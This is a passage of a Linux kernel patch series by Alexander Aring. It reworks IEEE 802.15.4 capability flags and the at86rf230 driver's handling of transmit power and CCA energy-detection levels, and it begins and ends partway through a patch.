IEEE802154_HW_FRAME_RETRIES)) return -EOPNOTSUPP; @@ -179,6 +202,9 @@ ieee802154_set_lbt_mode(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, ASSERT_RTNL(); + if (wpan_dev->lbt == mode) + return 0; + if (!(local->hw.flags & IEEE802154_HW_LBT)) return -EOPNOTSUPP; From 8329fcf11f5c2ae2fb7b1f56f05b0bb899babc85 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:45 +0200 Subject: [PATCH 086/872] mac802154: remove check if operation is supported This patch removes the check if operation is supported by driver layer. This is done now by capabilities flags, if these are valid then the driver should support the operation, otherwise a WARN_ON occurs. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/cfg.c | 24 ------------------------ 1 file changed, 24 deletions(-) diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index 45c4dc39766e..d5290ea49dca 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -98,10 +98,6 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, if (wpan_phy_cca_cmp(&wpan_phy->cca, cca)) return 0; - /* check if phy support this setting */ - if (!(local->hw.flags & IEEE802154_HW_CCA_MODE)) - return -EOPNOTSUPP; - ret = drv_set_cca_mode(local, cca); if (!ret) wpan_phy->cca = *cca; @@ -127,17 +123,12 @@ ieee802154_set_backoff_exponent(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, u8 min_be, u8 max_be) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->min_be == min_be && wpan_dev->max_be == max_be) return 0; - if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) - return -EOPNOTSUPP; - wpan_dev->min_be = min_be; wpan_dev->max_be = max_be; return 0; @@ -161,16 +152,11 @@ ieee802154_set_max_csma_backoffs(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, u8 max_csma_backoffs) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->csma_retries == max_csma_backoffs) return 0; - if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) - return -EOPNOTSUPP; - wpan_dev->csma_retries = max_csma_backoffs; return 0; } @@ -180,16 +166,11 @@ ieee802154_set_max_frame_retries(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, s8 max_frame_retries) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->frame_retries == max_frame_retries) return 0; - if (!(local->hw.flags & IEEE802154_HW_FRAME_RETRIES)) - return -EOPNOTSUPP; - wpan_dev->frame_retries = max_frame_retries; return 0; } @@ -198,16 +179,11 @@ static int ieee802154_set_lbt_mode(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, bool mode) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->lbt == mode) return 0; - if (!(local->hw.flags & IEEE802154_HW_LBT)) - return -EOPNOTSUPP; - wpan_dev->lbt = mode; return 0; } From edea8f7c75ec6c238130bd7e74d9f6f4c26e97b0 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:46 +0200 Subject: [PATCH 087/872] cfg802154: introduce wpan phy flags This patch introduce a flag property for the wpan phy structure. The current flag settings in ieee802154_hw are accessable in mac802154 layer only which is okay for flags which indicates MAC handling which are done by phy. For real PHY layer settings like cca mode, transmit power, cca energy detection level. The difference between these flags are that the MAC handling flags are only handled in mac802154/HardMac layer e.g. on an interface up. The phy settings are direct netlink calls from nl802154 into the driver layer and the nl802154 need to have a chance to check if the driver supports this handling before sending to the next layer. We also check now on PHY flags while dumping and setting pib attributes. In comparing with MIB attributes the 802.15.4 gives us an default value which we assume when a transceiver implement less functionality. In case of MIB settings the nl802154 layer doesn't need to check on the ieee802154_hw flags then. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 9 +++++++-- include/net/cfg802154.h | 16 ++++++++++++++++ include/net/mac802154.h | 29 +++++++---------------------- net/ieee802154/nl802154.c | 27 +++++++++++++++++---------- net/mac802154/mac_cmd.c | 6 +++--- 5 files changed, 50 insertions(+), 37 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 151d57f4320d..b0ffd1cd0010 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1566,8 +1566,13 @@ at86rf230_detect_device(struct at86rf230_local *lp) } lp->hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AACK | - IEEE802154_HW_TXPOWER | IEEE802154_HW_ARET | - IEEE802154_HW_AFILT | IEEE802154_HW_PROMISCUOUS; + IEEE802154_HW_CSMA_PARAMS | + IEEE802154_HW_FRAME_RETRIES | IEEE802154_HW_AFILT | + IEEE802154_HW_PROMISCUOUS; + + lp->hw->phy->flags = WPAN_PHY_FLAG_TXPOWER | + WPAN_PHY_FLAG_CCA_ED_LEVEL | + WPAN_PHY_FLAG_CCA_MODE; lp->hw->phy->cca.mode = NL802154_CCA_ENERGY; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 37abc1603285..a12c6c5247e9 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -106,6 +106,20 @@ wpan_phy_cca_cmp(const struct wpan_phy_cca *a, const struct wpan_phy_cca *b) return true; } +/** + * @WPAN_PHY_FLAG_TRANSMIT_POWER: Indicates that transceiver will support + * transmit power setting. + * @WPAN_PHY_FLAG_CCA_ED_LEVEL: Indicates that transceiver will support cca ed + * level setting. + * @WPAN_PHY_FLAG_CCA_MODE: Indicates that transceiver will support cca mode + * setting. + */ +enum wpan_phy_flags { + WPAN_PHY_FLAG_TXPOWER = BIT(1), + WPAN_PHY_FLAG_CCA_ED_LEVEL = BIT(2), + WPAN_PHY_FLAG_CCA_MODE = BIT(3), +}; + struct wpan_phy { struct mutex pib_lock; @@ -117,6 +131,8 @@ struct wpan_phy { */ const void *privid; + u32 flags; + /* * This is a PIB according to 802.15.4-2011. * We do not provide timing-related variables, as they diff --git a/include/net/mac802154.h b/include/net/mac802154.h index 71e245605ef8..9605c7f7453f 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -89,41 +89,26 @@ struct ieee802154_hw { #define IEEE802154_HW_TX_OMIT_CKSUM 0x00000001 /* Indicates that receiver will autorespond with ACK frames. */ #define IEEE802154_HW_AACK 0x00000002 -/* Indicates that transceiver will support transmit power setting. */ -#define IEEE802154_HW_TXPOWER 0x00000004 /* Indicates that transceiver will support listen before transmit. */ -#define IEEE802154_HW_LBT 0x00000008 -/* Indicates that transceiver will support cca mode setting. */ -#define IEEE802154_HW_CCA_MODE 0x00000010 -/* Indicates that transceiver will support cca ed level setting. */ -#define IEEE802154_HW_CCA_ED_LEVEL 0x00000020 +#define IEEE802154_HW_LBT 0x00000004 /* Indicates that transceiver will support csma (max_be, min_be, csma retries) * settings. */ -#define IEEE802154_HW_CSMA_PARAMS 0x00000040 +#define IEEE802154_HW_CSMA_PARAMS 0x00000008 /* Indicates that transceiver will support ARET frame retries setting. */ -#define IEEE802154_HW_FRAME_RETRIES 0x00000080 +#define IEEE802154_HW_FRAME_RETRIES 0x00000010 /* Indicates that transceiver will support hardware address filter setting. */ -#define IEEE802154_HW_AFILT 0x00000100 +#define IEEE802154_HW_AFILT 0x00000020 /* Indicates that transceiver will support promiscuous mode setting. */ -#define IEEE802154_HW_PROMISCUOUS 0x00000200 +#define IEEE802154_HW_PROMISCUOUS 0x00000040 /* Indicates that receiver omits FCS. */ -#define IEEE802154_HW_RX_OMIT_CKSUM 0x00000400 +#define IEEE802154_HW_RX_OMIT_CKSUM 0x00000080 /* Indicates that receiver will not filter frames with bad checksum. */ -#define IEEE802154_HW_RX_DROP_BAD_CKSUM 0x00000800 +#define IEEE802154_HW_RX_DROP_BAD_CKSUM 0x00000100 /* Indicates that receiver omits FCS and xmitter will add FCS on it's own. */ #define IEEE802154_HW_OMIT_CKSUM (IEEE802154_HW_TX_OMIT_CKSUM | \ IEEE802154_HW_RX_OMIT_CKSUM) -/* This groups the most common CSMA support fields into one. */ -#define IEEE802154_HW_CSMA (IEEE802154_HW_CCA_MODE | \ - IEEE802154_HW_CCA_ED_LEVEL | \ - IEEE802154_HW_CSMA_PARAMS) - -/* This groups the most common ARET support fields into one. */ -#define IEEE802154_HW_ARET (IEEE802154_HW_CSMA | \ - IEEE802154_HW_FRAME_RETRIES) - /* struct ieee802154_ops - callbacks from mac802154 to the driver * * This structure contains various callbacks that the driver may diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index fa0c4048b0e8..40fb0be009b2 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -291,19 +291,23 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; /* cca mode */ - if (nla_put_u32(msg, NL802154_ATTR_CCA_MODE, - rdev->wpan_phy.cca.mode)) - goto nla_put_failure; - - if (rdev->wpan_phy.cca.mode == NL802154_CCA_ENERGY_CARRIER) { - if (nla_put_u32(msg, NL802154_ATTR_CCA_OPT, - rdev->wpan_phy.cca.opt)) + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) { + if (nla_put_u32(msg, NL802154_ATTR_CCA_MODE, + rdev->wpan_phy.cca.mode)) goto nla_put_failure; + + if (rdev->wpan_phy.cca.mode == NL802154_CCA_ENERGY_CARRIER) { + if (nla_put_u32(msg, NL802154_ATTR_CCA_OPT, + rdev->wpan_phy.cca.opt)) + goto nla_put_failure; + } } - if (nla_put_s32(msg, NL802154_ATTR_TX_POWER, - rdev->wpan_phy.transmit_power)) - goto nla_put_failure; + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_TXPOWER) { + if (nla_put_s32(msg, NL802154_ATTR_TX_POWER, + rdev->wpan_phy.transmit_power)) + goto nla_put_failure; + } finish: genlmsg_end(msg, hdr); @@ -637,6 +641,9 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) struct cfg802154_registered_device *rdev = info->user_ptr[0]; struct wpan_phy_cca cca; + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) + return -EOPNOTSUPP; + if (!info->attrs[NL802154_ATTR_CCA_MODE]) return -EINVAL; diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index bdccb4ecd30f..6dcbb3b5994c 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -91,19 +91,19 @@ static int mac802154_set_mac_params(struct net_device *dev, wpan_dev->frame_retries = params->frame_retries; wpan_dev->lbt = params->lbt; - if (local->hw.flags & IEEE802154_HW_TXPOWER) { + if (local->hw.phy->flags & WPAN_PHY_FLAG_TXPOWER) { ret = drv_set_tx_power(local, params->transmit_power); if (ret < 0) return ret; } - if (local->hw.flags & IEEE802154_HW_CCA_MODE) { + if (local->hw.phy->flags & WPAN_PHY_FLAG_CCA_MODE) { ret = drv_set_cca_mode(local, ¶ms->cca); if (ret < 0) return ret; } - if (local->hw.flags & IEEE802154_HW_CCA_ED_LEVEL) { + if (local->hw.phy->flags & WPAN_PHY_FLAG_CCA_ED_LEVEL) { ret = drv_set_cca_ed_level(local, params->cca_ed_level); if (ret < 0) return ret; From 65318680c97cca15e3678148b3a5acaa33e991ec Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:47 +0200 Subject: [PATCH 088/872] ieee802154: add iftypes capability This patch adds capability flags for supported interface types. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 2 +- net/ieee802154/nl802154.c | 3 ++- net/mac802154/main.c | 6 ++++++ 3 files changed, 9 insertions(+), 2 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index a12c6c5247e9..11bbf17ad865 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -80,7 +80,7 @@ wpan_phy_supported_bool(bool b, enum nl802154_supported_bool_states st) struct wpan_phy_supported { u32 channels[IEEE802154_MAX_PAGE + 1], - cca_modes, cca_opts; + cca_modes, cca_opts, iftypes; enum nl802154_supported_bool_states lbt; u8 min_minbe, max_minbe, min_maxbe, max_maxbe, min_csma_backoffs, max_csma_backoffs; diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 40fb0be009b2..3afb20e43ff8 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -579,7 +579,8 @@ static int nl802154_new_interface(struct sk_buff *skb, struct genl_info *info) if (info->attrs[NL802154_ATTR_IFTYPE]) { type = nla_get_u32(info->attrs[NL802154_ATTR_IFTYPE]); - if (type > NL802154_IFTYPE_MAX) + if (type > NL802154_IFTYPE_MAX || + !(rdev->wpan_phy.supported.iftypes & BIT(type))) return -EINVAL; } diff --git a/net/mac802154/main.c b/net/mac802154/main.c index ddcd6ff8d39c..356b346e1ee8 100644 --- a/net/mac802154/main.c +++ b/net/mac802154/main.c @@ -116,6 +116,9 @@ ieee802154_alloc_hw(size_t priv_data_len, const struct ieee802154_ops *ops) phy->supported.max_csma_backoffs = 5; phy->supported.lbt = NL802154_SUPPORTED_BOOL_FALSE; + /* always supported */ + phy->supported.iftypes = BIT(NL802154_IFTYPE_NODE); + return &local->hw; } EXPORT_SYMBOL(ieee802154_alloc_hw); @@ -181,6 +184,9 @@ int ieee802154_register_hw(struct ieee802154_hw *hw) local->phy->supported.max_frame_retries = -1; } + if (hw->flags & IEEE802154_HW_PROMISCUOUS) + local->phy->supported.iftypes |= BIT(NL802154_IFTYPE_MONITOR); + rc = wpan_phy_register(local->phy); if (rc < 0) goto out_wq; From 8377d22c0385b4a08ddeb1029b80674eb5db38b4 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:48 +0200 Subject: [PATCH 089/872] at86rf230: set cca_modes supported flags This patch sets the at86rf230 supported cca modes. In case of at86rf212 it also can support listen before transmit. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index b0ffd1cd0010..fabde3ac49b3 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1574,6 +1574,11 @@ at86rf230_detect_device(struct at86rf230_local *lp) WPAN_PHY_FLAG_CCA_ED_LEVEL | WPAN_PHY_FLAG_CCA_MODE; + lp->hw->phy->supported.cca_modes = BIT(NL802154_CCA_ENERGY) | + BIT(NL802154_CCA_CARRIER) | BIT(NL802154_CCA_ENERGY_CARRIER); + lp->hw->phy->supported.cca_opts = BIT(NL802154_CCA_OPT_ENERGY_CARRIER_AND) | + BIT(NL802154_CCA_OPT_ENERGY_CARRIER_OR); + lp->hw->phy->cca.mode = NL802154_CCA_ENERGY; switch (part) { @@ -1596,6 +1601,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.channels[2] = 0x00007FF; lp->hw->phy->current_channel = 5; lp->hw->phy->symbol_duration = 25; + lp->hw->phy->supported.lbt = NL802154_SUPPORTED_BOOL_BOTH; break; case 11: chip = "at86rf233"; From 6f4da3f897906d0e1f27e3e44bd445f8e6d7bd85 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:49 +0200 Subject: [PATCH 090/872] at86rf230: rework tx power support This patch adds support for get transmit power levels and reworks the set of transmit power levels which was broken before. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 83 +++++++++++++++++++++++------- 1 file changed, 64 insertions(+), 19 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index fabde3ac49b3..dff7e47f5afb 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -51,6 +51,7 @@ struct at86rf2xx_chip_data { int (*set_channel)(struct at86rf230_local *, u8, u8); int (*get_desense_steps)(struct at86rf230_local *, s32); + int (*set_txpower)(struct at86rf230_local *, s32); }; #define AT86RF2XX_MAX_BUF (127 + 3) @@ -124,9 +125,12 @@ struct at86rf230_local { #define SR_IRQ_2_EXT_EN 0x04, 0x40, 6 #define SR_PA_EXT_EN 0x04, 0x80, 7 #define RG_PHY_TX_PWR (0x05) -#define SR_TX_PWR 0x05, 0x0f, 0 -#define SR_PA_LT 0x05, 0x30, 4 -#define SR_PA_BUF_LT 0x05, 0xc0, 6 +#define SR_TX_PWR_23X 0x05, 0x0f, 0 +#define SR_PA_LT_230 0x05, 0x30, 4 +#define SR_PA_BUF_LT_230 0x05, 0xc0, 6 +#define SR_TX_PWR_212 0x05, 0x1f, 0 +#define SR_GC_PA_212 0x05, 0x60, 5 +#define SR_PA_BOOST_LT_212 0x05, 0x80, 7 #define RG_PHY_RSSI (0x06) #define SR_RSSI 0x06, 0x1f, 0 #define SR_RND_VALUE 0x06, 0x60, 5 @@ -1193,24 +1197,56 @@ at86rf230_set_hw_addr_filt(struct ieee802154_hw *hw, return 0; } +#define AT86RF23X_MAX_TX_POWERS 0xF +static const s32 at86rf233_powers[AT86RF23X_MAX_TX_POWERS + 1] = { + 400, 370, 340, 300, 250, 200, 100, 0, -100, -200, -300, -400, -600, + -800, -1200, -1700, +}; + +static const s32 at86rf231_powers[AT86RF23X_MAX_TX_POWERS + 1] = { + 300, 280, 230, 180, 130, 70, 0, -100, -200, -300, -400, -500, -700, + -900, -1200, -1700, +}; + +#define AT86RF212_MAX_TX_POWERS 0x1F +static const s32 at86rf212_powers[AT86RF212_MAX_TX_POWERS + 1] = { + 500, 400, 300, 200, 100, 0, -100, -200, -300, -400, -500, -600, -700, + -800, -900, -1000, -1100, -1200, -1300, -1400, -1500, -1600, -1700, + -1800, -1900, -2000, -2100, -2200, -2300, -2400, -2500, -2600, +}; + static int -at86rf230_set_txpower(struct ieee802154_hw *hw, s32 mbm) +at86rf23x_set_txpower(struct at86rf230_local *lp, s32 mbm) { - struct at86rf230_local *lp = hw->priv; - s8 db = mbm / 100; + u32 i; - /* typical maximum output is 5dBm with RG_PHY_TX_PWR 0x60, lower five - * bits decrease power in 1dB steps. 0x60 represents extra PA gain of - * 0dB. - * thus, supported values for db range from -26 to 5, for 31dB of - * reduction to 0dB of reduction. - */ - if (db > 5 || db < -26) - return -EINVAL; + for (i = 0; i < lp->hw->phy->supported.tx_powers_size; i++) { + if (lp->hw->phy->supported.tx_powers[i] == mbm) + return at86rf230_write_subreg(lp, SR_TX_PWR_23X, i); + } + + return -EINVAL; +} + +static int +at86rf212_set_txpower(struct at86rf230_local *lp, s32 mbm) +{ + u32 i; + + for (i = 0; i < lp->hw->phy->supported.tx_powers_size; i++) { + if (lp->hw->phy->supported.tx_powers[i] == mbm) + return at86rf230_write_subreg(lp, SR_TX_PWR_212, i); + } - db = -(db - 5); + return -EINVAL; +} + +static int +at86rf230_set_txpower(struct ieee802154_hw *hw, s32 mbm) +{ + struct at86rf230_local *lp = hw->priv; - return __at86rf230_write(lp, RG_PHY_TX_PWR, 0x60 | db); + return lp->data->set_txpower(lp, mbm); } static int @@ -1367,7 +1403,8 @@ static struct at86rf2xx_chip_data at86rf233_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps + .get_desense_steps = at86rf23x_get_desens_steps, + .set_txpower = at86rf23x_set_txpower, }; static struct at86rf2xx_chip_data at86rf231_data = { @@ -1380,7 +1417,8 @@ static struct at86rf2xx_chip_data at86rf231_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps + .get_desense_steps = at86rf23x_get_desens_steps, + .set_txpower = at86rf23x_set_txpower, }; static struct at86rf2xx_chip_data at86rf212_data = { @@ -1393,7 +1431,8 @@ static struct at86rf2xx_chip_data at86rf212_data = { .t_p_ack = 545, .rssi_base_val = -100, .set_channel = at86rf212_set_channel, - .get_desense_steps = at86rf212_get_desens_steps + .get_desense_steps = at86rf212_get_desens_steps, + .set_txpower = at86rf212_set_txpower, }; static int at86rf230_hw_init(struct at86rf230_local *lp, u8 xtal_trim) @@ -1592,6 +1631,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 11; lp->hw->phy->symbol_duration = 16; + lp->hw->phy->supported.tx_powers = at86rf231_powers; + lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf231_powers); break; case 7: chip = "at86rf212"; @@ -1602,6 +1643,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->current_channel = 5; lp->hw->phy->symbol_duration = 25; lp->hw->phy->supported.lbt = NL802154_SUPPORTED_BOOL_BOTH; + lp->hw->phy->supported.tx_powers = at86rf212_powers; + lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf212_powers); break; case 11: chip = "at86rf233"; @@ -1609,6 +1652,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 13; lp->hw->phy->symbol_duration = 16; + lp->hw->phy->supported.tx_powers = at86rf233_powers; + lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf233_powers); break; default: chip = "unknown"; From 2d9fe7ab372a75c0148027bc48a18a64f150a7e7 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:50 +0200 Subject: [PATCH 091/872] at86rf230: rework tx cca energy detection level This patch reworks the cca energy detection level handling. This contains a calculation which works on all transceiver types and add support for dump cca energy detection levels. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 79 ++++++++++++++++++++++-------- 1 file changed, 59 insertions(+), 20 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index dff7e47f5afb..833c42640e40 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -50,7 +50,6 @@ struct at86rf2xx_chip_data { int rssi_base_val; int (*set_channel)(struct at86rf230_local *, u8, u8); - int (*get_desense_steps)(struct at86rf230_local *, s32); int (*set_txpower)(struct at86rf230_local *, s32); }; @@ -1080,6 +1079,50 @@ at86rf23x_set_channel(struct at86rf230_local *lp, u8 page, u8 channel) return at86rf230_write_subreg(lp, SR_CHANNEL, channel); } +#define AT86RF2XX_MAX_ED_LEVELS 0xF +static const s32 at86rf23x_ed_levels[AT86RF2XX_MAX_ED_LEVELS + 1] = { + -9100, -8900, -8700, -8500, -8300, -8100, -7900, -7700, -7500, -7300, + -7100, -6900, -6700, -6500, -6300, -6100, +}; + +static const s32 at86rf212_ed_levels_100[AT86RF2XX_MAX_ED_LEVELS + 1] = { + -10000, -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, + -8000, -7800, -7600, -7400, -7200, +}; + +static const s32 at86rf212_ed_levels_98[AT86RF2XX_MAX_ED_LEVELS + 1] = { + -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, -8000, + -7800, -7600, -7400, -7200, -7000, +}; + +static inline int +at86rf212_update_cca_ed_level(struct at86rf230_local *lp, int rssi_base_val) +{ + unsigned int cca_ed_thres; + int rc; + + rc = at86rf230_read_subreg(lp, SR_CCA_ED_THRES, &cca_ed_thres); + if (rc < 0) + return rc; + + switch (rssi_base_val) { + case -98: + lp->hw->phy->supported.cca_ed_levels = at86rf212_ed_levels_98; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf212_ed_levels_98); + lp->hw->phy->cca_ed_level = at86rf212_ed_levels_98[cca_ed_thres]; + break; + case -100: + lp->hw->phy->supported.cca_ed_levels = at86rf212_ed_levels_100; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf212_ed_levels_100); + lp->hw->phy->cca_ed_level = at86rf212_ed_levels_100[cca_ed_thres]; + break; + default: + WARN_ON(1); + } + + return 0; +} + static int at86rf212_set_channel(struct at86rf230_local *lp, u8 page, u8 channel) { @@ -1102,6 +1145,10 @@ at86rf212_set_channel(struct at86rf230_local *lp, u8 page, u8 channel) if (rc < 0) return rc; + rc = at86rf212_update_cca_ed_level(lp, lp->data->rssi_base_val); + if (rc < 0) + return rc; + /* This sets the symbol_duration according frequency on the 212. * TODO move this handling while set channel and page in cfg802154. * We can do that, this timings are according 802.15.4 standard. @@ -1291,29 +1338,19 @@ at86rf230_set_cca_mode(struct ieee802154_hw *hw, return at86rf230_write_subreg(lp, SR_CCA_MODE, val); } -static int -at86rf212_get_desens_steps(struct at86rf230_local *lp, s32 level) -{ - return (level - lp->data->rssi_base_val) * 100 / 207; -} - -static int -at86rf23x_get_desens_steps(struct at86rf230_local *lp, s32 level) -{ - return (level - lp->data->rssi_base_val) / 2; -} static int at86rf230_set_cca_ed_level(struct ieee802154_hw *hw, s32 mbm) { struct at86rf230_local *lp = hw->priv; - s32 level = mbm / 100; + u32 i; - if (level < lp->data->rssi_base_val || level > 30) - return -EINVAL; + for (i = 0; i < hw->phy->supported.cca_ed_levels_size; i++) { + if (hw->phy->supported.cca_ed_levels[i] == mbm) + return at86rf230_write_subreg(lp, SR_CCA_ED_THRES, i); + } - return at86rf230_write_subreg(lp, SR_CCA_ED_THRES, - lp->data->get_desense_steps(lp, level)); + return -EINVAL; } static int @@ -1403,7 +1440,6 @@ static struct at86rf2xx_chip_data at86rf233_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps, .set_txpower = at86rf23x_set_txpower, }; @@ -1417,7 +1453,6 @@ static struct at86rf2xx_chip_data at86rf231_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps, .set_txpower = at86rf23x_set_txpower, }; @@ -1431,7 +1466,6 @@ static struct at86rf2xx_chip_data at86rf212_data = { .t_p_ack = 545, .rssi_base_val = -100, .set_channel = at86rf212_set_channel, - .get_desense_steps = at86rf212_get_desens_steps, .set_txpower = at86rf212_set_txpower, }; @@ -1618,6 +1652,9 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.cca_opts = BIT(NL802154_CCA_OPT_ENERGY_CARRIER_AND) | BIT(NL802154_CCA_OPT_ENERGY_CARRIER_OR); + lp->hw->phy->supported.cca_ed_levels = at86rf23x_ed_levels; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf23x_ed_levels); + lp->hw->phy->cca.mode = NL802154_CCA_ENERGY; switch (part) { @@ -1645,6 +1682,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.lbt = NL802154_SUPPORTED_BOOL_BOTH; lp->hw->phy->supported.tx_powers = at86rf212_powers; lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf212_powers); + lp->hw->phy->supported.cca_ed_levels = at86rf212_ed_levels_100; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf212_ed_levels_100); break; case 11: chip = "at86rf233"; From cc643496c0c3f242e5df9dc2bc243764d269d4f1 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:51 +0200 Subject: [PATCH 092/872] at86rf230: add cca ed level reset value This patch adds reset values for cca ed level values after running reset procedure. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 833c42640e40..3aa7bc9488e4 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1661,7 +1661,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) case 2: chip = "at86rf230"; rc = -ENOTSUPP; - break; + goto not_supp; case 3: chip = "at86rf231"; lp->data = &at86rf231_data; @@ -1697,9 +1697,12 @@ at86rf230_detect_device(struct at86rf230_local *lp) default: chip = "unknown"; rc = -ENOTSUPP; - break; + goto not_supp; } + lp->hw->phy->cca_ed_level = lp->hw->phy->supported.cca_ed_levels[7]; + +not_supp: dev_info(&lp->spi->dev, "Detected %s chip version %d\n", chip, version); return rc; From 392f4e67ad96e1d686c700cba5e218d40347426d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:52 +0200 Subject: [PATCH 093/872] at86rf230: add reset states of tx power level This patch adds the reset states for tx power levels after running reset procedure. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 3aa7bc9488e4..5601c743fa7b 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1701,6 +1701,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) } lp->hw->phy->cca_ed_level = lp->hw->phy->supported.cca_ed_levels[7]; + lp->hw->phy->transmit_power = lp->hw->phy->supported.tx_powers[0]; not_supp: dev_info(&lp->spi->dev, 